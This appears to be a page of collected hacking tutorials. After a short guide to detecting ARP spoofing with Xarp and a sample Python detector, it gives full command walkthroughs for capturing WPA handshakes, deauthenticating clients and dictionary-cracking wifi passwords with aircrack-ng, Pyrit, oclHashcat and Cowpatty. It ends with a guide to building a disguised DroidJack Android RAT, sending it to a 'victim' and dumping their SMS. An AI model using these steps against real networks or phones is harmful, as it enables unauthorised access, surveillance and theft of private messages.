How to Detect Sniffer on Your Network

Xarp is an advanced anti-spoofing tool that flags spoofing attacks using ARP (Address Resolution Protocol) against your system. This covers documents, emails and VoIP conversations. ARP attacks allow a hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect attackers inside the network. Having such a tool on the system is important because the Windows firewall and OS security do not provide protection against ARP attacks.

Download the latest Xarp version from http://xarp.software.informer.com/download/

After it has downloaded, install it on your computer. Now we will perform an attack on a system with Xarp installed. To show the tool's effectiveness, we perform the attack with Bettercap.

As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.

It is to be noted that there was no such alert or blocking from either the Windows firewall or Defender, but Xarp detects the intrusion and warns about it.
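To make the passive detection described above concrete, here is an added example (not Xarp's code and not part of the original post) that applies the two checks a passive ARP monitor relies on to a constructed list of ARP replies: an IP whose MAC changes after it was learned, and one MAC answering for several IPs, which is what an ARP poisoning tool such as Bettercap produces. The IP and MAC values are constructed samples.

```python
# Added example: a minimal passive ARP-spoof detector over a constructed list
# of observed ARP replies (not live traffic). It flags the two classic
# symptoms of ARP poisoning:
#   1. an IP address whose MAC changes after it was first learned, and
#   2. one MAC claiming more than one IP on the subnet (a typical MITM box
#      answering for both the gateway and a victim).
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample of ARP replies as (sender_ip, sender_mac) pairs, in the
# order a sniffer would see them. The last two entries mimic a poisoning run
# where aa:bb:cc:dd:ee:99 claims both the gateway's and a host's IP.
SAMPLE_ARP_REPLIES: List[Tuple[str, str]] = [
    ("192.168.1.1", "3c:1e:04:aa:bb:01"),   # legitimate gateway
    ("192.168.1.10", "c8:3a:35:11:22:33"),  # legitimate host
    ("192.168.1.20", "00:11:22:33:44:55"),  # another legitimate host
    ("192.168.1.1", "aa:bb:cc:dd:ee:99"),   # gateway IP now from a new MAC
    ("192.168.1.10", "aa:bb:cc:dd:ee:99"),  # same MAC also claims a host IP
]


def detect_arp_spoofing(replies: List[Tuple[str, str]]) -> List[str]:
    """Return a list of alert strings for suspicious ARP replies.

    The first MAC seen for an IP is trusted; a real deployment would seed
    ip_to_mac from a known-good static mapping instead of learning it.
    """
    ip_to_mac: Dict[str, str] = {}
    mac_to_ips = defaultdict(set)
    alerts: List[str] = []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac
        elif known != mac:
            alerts.append(f"MAC change for {ip}: {known} -> {mac}")
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print("ALERT:", alert)
```

On the sample data the detector raises three alerts: two MAC changes (gateway and host) and one multiple-IP claim for the poisoning MAC.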

Author: Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First, start monitor mode on our wireless adapter:

airmon-ng start wlan0

Monitor mode is now enabled on an interface named wlan0mon.

Then start listening to all the available wifi networks with the following command:

airodump-ng wlan0mon

The above command lists all the wifi traffic nearby, so wait until your target appears and then press Ctrl+C.

Now we have to listen on the specific channel the target is on. Run the command:

airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon

-c == channel number of the target (2 in my case; see the CH column)

--bssid == MAC address of the target AP

--write == name of the capture file

Now wait until the WPA handshake is captured and then press Ctrl+C.

A file named sommay-01.cap will now be generated.

PYRIT

The first method to crack the password from the capture file is PYRIT. We will use a dictionary attack, so run the command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file, in our case the dictionary

-r == path to the capture file (in our case sommay-01.cap)

attack_passthrough == specifies that a dictionary attack is to be performed

As you can see, it has successfully cracked the password.

OCLHASHCAT

First of all, download oclHashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng to .hccap with aircrack-ng, using the command:

aircrack-ng sommay-01.cap -J sommay-01

-J == path to the output file; the .hccap extension is added automatically

Now copy the dictionary you want to use into the Hashcat folder. Then enter the hashcat folder and run the command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In the above command, if you are using a 32-bit system, replace 64 with 32.

-m == hash type, which is 2500 for WPA/WPA2 cracking

Then give the path to the .hccap file you converted with aircrack-ng, followed by the name of the dictionary file. As you can see, it has successfully cracked the password.

COWPATTY

For cracking with cowpatty we first have to generate a hash file specific to the target AP. For this we use genpmk, so run the command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID (name) of the target AP (must be identical to the target AP's name)

This generates a dictionary file named cowpatty_dict, which speeds up the cracking process.

Now run the command:

cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to the dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP (must be identical to the target AP's name)

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.

Crack Wifi Password using Aircrack-Ng (Beginner’s Guide)

This is the classical method of wireless password cracking. All the tools use this method in one way or another.

First start monitor mode, which will listen to all the wifi connections nearby, with the command:

airmon-ng start wlan0

In the lower right corner of the output you will see: monitor mode enabled for [phy1]wlan0mon

Now run the following command to confirm that our wifi adapter is in monitor mode:

ifconfig

This will show the wifi adapter as wlan0mon, meaning the adapter is in monitor mode.

Now run the command:

airodump-ng wlan0mon

The above command will start listening to all the available wifi connections.

Now when your target appears, press Ctrl+C and then capture the handshake with the command:

airodump-ng -c 7 --bssid C8:XX:35:XX:FD:F0 --write 1 wlan0mon

Here,

-c is the channel number of the AP, listed in the CH column of the output of the previous command; in my case it is 7.

--bssid is the MAC address of the target AP; in my case the AP is rajlab and its bssid is C8:3A:XX:44:XX:F0

--write is the capture file in which the captured packets will be saved; in my case I have named it 1

Option    Description
-c        The channel for the wireless network
--bssid   The MAC address of the access point
-w        The file name prefix for the file which will contain the authentication handshake
mon0      The wireless interface

Now start the deauth attack to disconnect all the clients connected to that AP, which will help in capturing the handshake, with the command:

aireplay-ng -0 100 -a XX:3A:35:XX:FD:F0 -e rajlab wlan0mon

Here,

-0 is used for the deauth attack

100 is the number of deauth packets to be sent

-a is the target AP MAC address

-e is the ESSID of the target AP, i.e. the name of the target AP

After launching the deauth attack we will see the WPA handshake in the top right corner of the previous terminal window; then press Ctrl+C.

Now we have to crack the password with aircrack-ng, so type the command:

aircrack-ng 1-01.cap -w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture file we generated with airodump-ng.

-w is the dictionary to be used to perform the dictionary attack

In my case the key is found as KEY FOUND! [raj123987]

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.

Hack Any Android Phone with DroidJack (Beginner’s Guide)

DroidJack is an Android RAT which gives you the power to establish control over your victim's Android devices with an easy-to-use GUI and all the features you need to monitor them.

First of all, download DroidJack from http://droidjack.net

Now execute DroidJack, which is an executable jar file. It will prompt you for login, so enter your username and password.

Clicking on the Unlock button will open the GUI interface.

Now click on Generate APK and then edit App Name and File Name with the names of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and the port number of your system in the Port Number field, and then click on Generate.

After some time it will show a prompt saying that the APK was successfully generated and can be found in the same folder as your DroidJack application.

So now go to Devices and set the port field in the lower left corner to the same port with which you generated the APK (in my case 1337), and then click on Reception to start listening mode.

Now send the APK RAT to your victim by any means.

After installing the app, when the victim clicks on the button we will get the Android session.

As you can see below, the phone is listed in the Devices list.

Right-clicking on the mobile device will give a list of options which you can use.

For demo purposes I have used SMS Trekker, and as you can see it has dumped all the SMS.

Author: Sahil Gujjar is an information security enthusiast and technical writer.
